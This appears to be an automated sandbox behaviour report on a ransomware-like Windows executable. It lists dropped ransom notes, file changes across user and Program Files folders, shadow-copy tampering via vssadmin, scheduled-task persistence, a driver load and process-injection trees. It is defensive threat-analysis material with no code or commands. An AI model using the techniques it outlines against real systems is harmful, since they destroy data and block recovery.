941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exeFCcth9iY64.exedescription ioc process File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: FCcth9iY64.exe File opened (read-only) \??\I: FCcth9iY64.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: FCcth9iY64.exe File opened (read-only) \??\O: FCcth9iY64.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: FCcth9iY64.exe File opened (read-only) \??\L: FCcth9iY64.exe File opened (read-only) \??\S: FCcth9iY64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: FCcth9iY64.exe File opened (read-only) \??\P: FCcth9iY64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: FCcth9iY64.exe File opened (read-only) \??\W: FCcth9iY64.exe File opened (read-only) \??\X: FCcth9iY64.exe File opened (read-only) \??\Z: FCcth9iY64.exe File opened (read-only) \??\A: FCcth9iY64.exe File opened (read-only) \??\J: FCcth9iY64.exe File opened (read-only) \??\R: FCcth9iY64.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: FCcth9iY64.exe File opened (read-only) \??\K: FCcth9iY64.exe File opened (read-only) \??\Y: FCcth9iY64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: FCcth9iY64.exe File opened (read-only) \??\Q: FCcth9iY64.exe File opened (read-only) \??\T: FCcth9iY64.exe File opened (read-only) \??\V: FCcth9iY64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 151 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\hC6vpv1h.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exedescription ioc process File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pa.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\el.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveNoDrop32x32.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\unpack200.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\am.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gl.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\Microsoft.WindowsDesktop.App.runtimeconfig.json 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\CompleteSplit.xlsx 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lb.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mr.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\LICENSE 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hu.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.exe.sig 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\UnblockResume.xla 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\identity_helper.Sparse.Beta.msix 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\java.security 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Notifications\SoftLandingAssetLight.gif.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\psfont.properties.ja 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\UpdateUnregister.edrwx 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_proxy\stable.identity_helper.exe.manifest 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\SmallLogoCanary.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ro.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\hijrah-config-umalqura.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_proxy.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\zh-CN.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\lt.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\Microsoft.WindowsDesktop.App.deps.json 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EdgeWebView.dat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\kn.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_sv.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\PrivateBrowsing_70.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\cy.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\lo.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gu.pak.DATA 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\WidevineCdm\_platform_specific\win_x64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ko.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 5848 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exeFCcth9iY64.exepid process 4308 powershell.exe 4308 powershell.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe 3680 FCcth9iY64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
FCcth9iY64.exepid process 3680 FCcth9iY64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetakeown.exeFCcth9iY64.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 4308 powershell.exe Token: SeTakeOwnershipPrivilege 3212 takeown.exe Token: SeDebugPrivilege 3680 FCcth9iY64.exe Token: SeLoadDriverPrivilege 3680 FCcth9iY64.exe Token: SeTakeOwnershipPrivilege 2080 takeown.exe Token: SeTakeOwnershipPrivilege 5708 takeown.exe Token: SeTakeOwnershipPrivilege 5200 takeown.exe Token: SeTakeOwnershipPrivilege 5532 takeown.exe Token: SeTakeOwnershipPrivilege 6016 takeown.exe Token: SeTakeOwnershipPrivilege 5768 takeown.exe Token: SeBackupPrivilege 1932 vssvc.exe Token: SeRestorePrivilege 1932 vssvc.exe Token: SeAuditPrivilege 1932 vssvc.exe Token: SeTakeOwnershipPrivilege 4076 takeown.exe Token: SeTakeOwnershipPrivilege 1380 takeown.exe Token: SeTakeOwnershipPrivilege 4736 takeown.exe Token: SeIncreaseQuotaPrivilege 5872 WMIC.exe Token: SeSecurityPrivilege 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 5872 WMIC.exe Token: SeLoadDriverPrivilege 5872 WMIC.exe Token: SeSystemProfilePrivilege 5872 WMIC.exe Token: SeSystemtimePrivilege 5872 WMIC.exe Token: SeProfSingleProcessPrivilege 5872 WMIC.exe Token: SeIncBasePriorityPrivilege 5872 WMIC.exe Token: SeCreatePagefilePrivilege 5872 WMIC.exe Token: SeBackupPrivilege 5872 WMIC.exe Token: SeRestorePrivilege 5872 WMIC.exe Token: SeShutdownPrivilege 5872 WMIC.exe Token: SeDebugPrivilege 5872 WMIC.exe Token: SeSystemEnvironmentPrivilege 5872 WMIC.exe Token: SeRemoteShutdownPrivilege 5872 WMIC.exe Token: SeUndockPrivilege 5872 WMIC.exe Token: SeManageVolumePrivilege 5872 WMIC.exe Token: 33 5872 WMIC.exe Token: 34 5872 WMIC.exe Token: 35 5872 WMIC.exe Token: 36 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 2196 takeown.exe Token: SeTakeOwnershipPrivilege 4948 takeown.exe Token: SeIncreaseQuotaPrivilege 5872 WMIC.exe Token: SeSecurityPrivilege 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 5872 WMIC.exe Token: SeLoadDriverPrivilege 5872 WMIC.exe Token: SeSystemProfilePrivilege 5872 WMIC.exe Token: SeSystemtimePrivilege 5872 WMIC.exe Token: SeProfSingleProcessPrivilege 5872 WMIC.exe Token: SeIncBasePriorityPrivilege 5872 WMIC.exe Token: SeCreatePagefilePrivilege 5872 WMIC.exe Token: SeBackupPrivilege 5872 WMIC.exe Token: SeRestorePrivilege 5872 WMIC.exe Token: SeShutdownPrivilege 5872 WMIC.exe Token: SeDebugPrivilege 5872 WMIC.exe Token: SeSystemEnvironmentPrivilege 5872 WMIC.exe Token: SeRemoteShutdownPrivilege 5872 WMIC.exe Token: SeUndockPrivilege 5872 WMIC.exe Token: SeManageVolumePrivilege 5872 WMIC.exe Token: 33 5872 WMIC.exe Token: 34 5872 WMIC.exe Token: 35 5872 WMIC.exe Token: 36 5872 WMIC.exe Token: SeTakeOwnershipPrivilege 3716 takeown.exe Token: SeTakeOwnershipPrivilege 5688 takeown.exe Token: SeTakeOwnershipPrivilege 3560 takeown.exe Token: SeTakeOwnershipPrivilege 5728 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.exeFCcth9iY.execmd.exedescription pid process target process PID 2268 wrote to memory of 2824 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 2824 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 2824 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1572 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWVcqERC.exe PID 2268 wrote to memory of 1572 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWVcqERC.exe PID 2268 wrote to memory of 1572 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe NWVcqERC.exe PID 2268 wrote to memory of 1680 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1680 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1680 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 1680 wrote to memory of 4308 1680 cmd.exe powershell.exe PID 1680 wrote to memory of 4308 1680 cmd.exe powershell.exe PID 1680 wrote to memory of 4308 1680 cmd.exe powershell.exe PID 2268 wrote to memory of 4248 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 4248 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 4248 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1352 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1352 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1352 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 4248 wrote to memory of 2860 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2860 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2860 4248 cmd.exe reg.exe PID 1352 wrote to memory of 3432 1352 cmd.exe wscript.exe PID 1352 wrote to memory of 3432 1352 cmd.exe wscript.exe PID 1352 wrote to memory of 3432 1352 cmd.exe wscript.exe PID 2268 wrote to memory of 4456 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 4456 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 4456 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 4248 wrote to memory of 5940 4248 cmd.exe reg.exe PID 4248 wrote to memory of 5940 4248 cmd.exe reg.exe PID 4248 wrote to memory of 5940 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4316 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4316 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4316 4248 cmd.exe reg.exe PID 4456 wrote to memory of 5228 4456 cmd.exe cacls.exe PID 4456 wrote to memory of 5228 4456 cmd.exe cacls.exe PID 4456 wrote to memory of 5228 4456 cmd.exe cacls.exe PID 3432 wrote to memory of 2008 3432 wscript.exe cmd.exe PID 3432 wrote to memory of 2008 3432 wscript.exe cmd.exe PID 3432 wrote to memory of 2008 3432 wscript.exe cmd.exe PID 2008 wrote to memory of 5352 2008 cmd.exe schtasks.exe PID 2008 wrote to memory of 5352 2008 cmd.exe schtasks.exe PID 2008 wrote to memory of 5352 2008 cmd.exe schtasks.exe PID 4456 wrote to memory of 3212 4456 cmd.exe takeown.exe PID 4456 wrote to memory of 3212 4456 cmd.exe takeown.exe PID 4456 wrote to memory of 3212 4456 cmd.exe takeown.exe PID 3432 wrote to memory of 5796 3432 wscript.exe cmd.exe PID 3432 wrote to memory of 5796 3432 wscript.exe cmd.exe PID 3432 wrote to memory of 5796 3432 wscript.exe cmd.exe PID 4456 wrote to memory of 5920 4456 cmd.exe cmd.exe PID 4456 wrote to memory of 5920 4456 cmd.exe cmd.exe PID 4456 wrote to memory of 5920 4456 cmd.exe cmd.exe PID 5920 wrote to memory of 5916 5920 cmd.exe FCcth9iY.exe PID 5920 wrote to memory of 5916 5920 cmd.exe FCcth9iY.exe PID 5920 wrote to memory of 5916 5920 cmd.exe FCcth9iY.exe PID 5796 wrote to memory of 680 5796 cmd.exe schtasks.exe PID 5796 wrote to memory of 680 5796 cmd.exe schtasks.exe PID 5796 wrote to memory of 680 5796 cmd.exe schtasks.exe PID 5916 wrote to memory of 3680 5916 FCcth9iY.exe FCcth9iY64.exe PID 5916 wrote to memory of 3680 5916 FCcth9iY.exe FCcth9iY64.exe PID 2268 wrote to memory of 1112 2268 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe cmd.exe PID 2268 wrote to memory of 1112 2268 